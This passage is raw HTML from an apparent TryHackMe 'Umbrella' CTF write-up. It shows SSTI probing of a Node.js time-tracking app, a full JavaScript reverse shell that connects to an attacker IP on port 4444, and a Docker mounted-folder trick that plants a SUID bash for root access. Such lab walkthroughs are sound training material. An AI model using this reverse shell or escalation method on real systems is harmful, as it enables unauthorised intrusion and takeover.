data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?fit=565%2C365&amp;ssl=1\" data-orig-size=\"565,365\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?fit=565%2C365&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?resize=565%2C365&#038;ssl=1\" alt=\"\" class=\"wp-image-134\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?w=565&amp;ssl=1 565w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?resize=300%2C194&amp;ssl=1 300w\" sizes=\"auto, (max-width: 565px) 100vw, 565px\" \/><\/figure>\n\n\n\n<div style=\"height:38px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>There is a login page here. From the pair of credentials we found, we can try logging in. We can log in with<em> <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">barry-b&#8217;s<\/mark><\/em> credentials. It looks like a user can update their time by entering a number or a mathematical expression in the input field.<\/p>\n\n\n\n<div style=\"height:42px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"980\" height=\"433\" data-attachment-id=\"136\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/image-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?fit=980%2C433&amp;ssl=1\" data-orig-size=\"980,433\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?fit=980%2C433&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?resize=980%2C433&#038;ssl=1\" alt=\"\" class=\"wp-image-136\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?w=980&amp;ssl=1 980w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?resize=300%2C133&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?resize=768%2C339&amp;ssl=1 768w\" sizes=\"auto, (max-width: 980px) 100vw, 980px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"685\" height=\"654\" data-attachment-id=\"137\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/image-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?fit=685%2C654&amp;ssl=1\" data-orig-size=\"685,654\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?fit=685%2C654&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?resize=685%2C654&#038;ssl=1\" alt=\"\" class=\"wp-image-137\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?w=685&amp;ssl=1 685w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?resize=300%2C286&amp;ssl=1 300w\" sizes=\"auto, (max-width: 685px) 100vw, 685px\" \/><\/figure>\n\n\n\n<div style=\"height:41px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">SSTI <\/mark><\/h3>\n\n\n\n<p>Every time we try SSTI payload <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong>{{7*7}}<\/strong><\/mark>, the time for barry-b changes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"553\" height=\"531\" data-attachment-id=\"138\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssti-1-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?fit=553%2C531&amp;ssl=1\" data-orig-size=\"553,531\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssti-1-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?fit=553%2C531&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?resize=553%2C531&#038;ssl=1\" alt=\"\" class=\"wp-image-138\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?w=553&amp;ssl=1 553w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?resize=300%2C288&amp;ssl=1 300w\" sizes=\"auto, (max-width: 553px) 100vw, 553px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"595\" height=\"572\" data-attachment-id=\"139\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssti-1-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?fit=595%2C572&amp;ssl=1\" data-orig-size=\"595,572\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssti-1-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?fit=595%2C572&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?resize=595%2C572&#038;ssl=1\" alt=\"\" class=\"wp-image-139\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?w=595&amp;ssl=1 595w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?resize=300%2C288&amp;ssl=1 300w\" sizes=\"auto, (max-width: 595px) 100vw, 595px\" \/><\/figure>\n\n\n\n<div style=\"height:34px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Although it seems like the app is vulnerable to SSTI, I was not able to get an RCE by trying various payloads<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can also see in the log files for the time-tracking app that our input was getting executed. Not sure if it was SSTI or just the mathematical expression 7*7 was getting executed. Anyway, we can move on to find another to escalate our privileges.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"333\" data-attachment-id=\"140\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssti-log\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?fit=1343%2C437&amp;ssl=1\" data-orig-size=\"1343,437\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssti-log\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?fit=1024%2C333&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=1024%2C333&#038;ssl=1\" alt=\"\" class=\"wp-image-140\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=1024%2C333&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=300%2C98&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=768%2C250&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?w=1343&amp;ssl=1 1343w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:44px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Root (In Docker)<\/mark><\/h3>\n\n\n\n<p>From our NMAP scan, we know that the framework being used for this application is Node.js Express. We will try to get Remote Code Execution by trying out a JavaScript reverse shell. We can simply paste the below payload (change IP to your VPN or AttackBox IP and Port as needed)<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"(function(){ var net = require(&quot;net&quot;), cp = require(&quot;child_process&quot;), sh = cp.spawn(&quot;\/bin\/bash&quot;, []); var client = new net.Socket(); client.connect(4444, &quot;10.13.1.112&quot;, function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return \/a\/;})();\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FF79C6\">function<\/span><span style=\"color: #F8F8F2\">(){ <\/span><span style=\"color: #FF79C6\">var<\/span><span style=\"color: #F8F8F2\"> net <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B\">require<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">net<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">), cp <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B\">require<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">child_process<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">), sh <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> cp.<\/span><span style=\"color: #50FA7B\">spawn<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">\/bin\/bash<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">, []); <\/span><span style=\"color: #FF79C6\">var<\/span><span style=\"color: #F8F8F2\"> client <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6; font-weight: bold\">new<\/span><span style=\"color: #F8F8F2\"> net.<\/span><span style=\"color: #50FA7B\">Socket<\/span><span style=\"color: #F8F8F2\">(); client.<\/span><span style=\"color: #50FA7B\">connect<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #BD93F9\">4444<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">10.13.1.112<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FF79C6\">function<\/span><span style=\"color: #F8F8F2\">(){ client.<\/span><span style=\"color: #50FA7B\">pipe<\/span><span style=\"color: #F8F8F2\">(sh.stdin); sh.stdout.<\/span><span style=\"color: #50FA7B\">pipe<\/span><span style=\"color: #F8F8F2\">(client); sh.stderr.<\/span><span style=\"color: #50FA7B\">pipe<\/span><span style=\"color: #F8F8F2\">(client); }); <\/span><span style=\"color: #FF79C6\">return<\/span><span style=\"color: #F1FA8C\"> <\/span><span style=\"color: #FF5555\">\/<\/span><span style=\"color: #F1FA8C\">a<\/span><span style=\"color: #FF5555\">\/<\/span><span style=\"color: #F8F8F2\">;})();<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:42px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Fortunately for us, it worked! and we are the root user inside the Docker container.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"149\" data-attachment-id=\"141\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/root\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?fit=783%2C149&amp;ssl=1\" data-orig-size=\"783,149\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"root\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?fit=783%2C149&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?resize=783%2C149&#038;ssl=1\" alt=\"\" class=\"wp-image-141\" style=\"width:1110px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?w=783&amp;ssl=1 783w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?resize=300%2C57&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?resize=768%2C146&amp;ssl=1 768w\" sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Root (on the Box)<\/mark><\/h2>\n\n\n\n<p>Going back to the SSH session, we can see that there is a mounted folder under the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>time-tracking <\/em><\/strong><\/mark><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-black-color\">application <\/mark>directory.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1005\" height=\"405\" data-attachment-id=\"142\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/mounted-folder-new\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?fit=1005%2C405&amp;ssl=1\" data-orig-size=\"1005,405\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"mounted-folder-new\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?fit=1005%2C405&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?resize=1005%2C405&#038;ssl=1\" alt=\"\" class=\"wp-image-142\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?w=1005&amp;ssl=1 1005w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?resize=300%2C121&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?resize=768%2C309&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>The same directory can be accessed from the container as the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>root <\/em><\/strong><\/mark>user. We can use this to our advantage. Theoretically, if we create a file in the root&#8217;s \/logs directory, it should appear in the <strong><em>logs <\/em><\/strong>under the <strong>time-Tracker-src<\/strong> folder in Claire-r&#8217;s home directory with root privileges on it. Let&#8217;s test it out!<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"985\" height=\"131\" data-attachment-id=\"143\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/hello-txt1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?fit=985%2C131&amp;ssl=1\" data-orig-size=\"985,131\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"hello-txt1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?fit=985%2C131&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?resize=985%2C131&#038;ssl=1\" alt=\"\" class=\"wp-image-143\" style=\"width:1037px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?w=985&amp;ssl=1 985w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?resize=300%2C40&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?resize=768%2C102&amp;ssl=1 768w\" sizes=\"auto, (max-width: 985px) 100vw, 985px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"171\" data-attachment-id=\"144\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/hello-txt2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?fit=1075%2C180&amp;ssl=1\" data-orig-size=\"1075,180\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"hello-txt2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?fit=1024%2C171&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=1024%2C171&#038;ssl=1\" alt=\"\" class=\"wp-image-144\" style=\"width:1019px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=1024%2C171&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=300%2C50&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=768%2C129&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?w=1075&amp;ssl=1 1075w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:35px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Great! This seems to be working. Let&#8217;s continue and copy the<strong><em> \/bin\/bash<\/em><\/strong> binary, and add a SUID bit to it so that Claire-r can run it and become root.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"517\" data-attachment-id=\"145\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/suid\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?fit=1190%2C601&amp;ssl=1\" data-orig-size=\"1190,601\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"suid\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?fit=1024%2C517&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=1024%2C517&#038;ssl=1\" alt=\"\" class=\"wp-image-145\" style=\"width:941px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=1024%2C517&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=300%2C152&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=768%2C388&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?w=1190&amp;ssl=1 1190w\" sizes=\"auto, (max-width: 1000px) 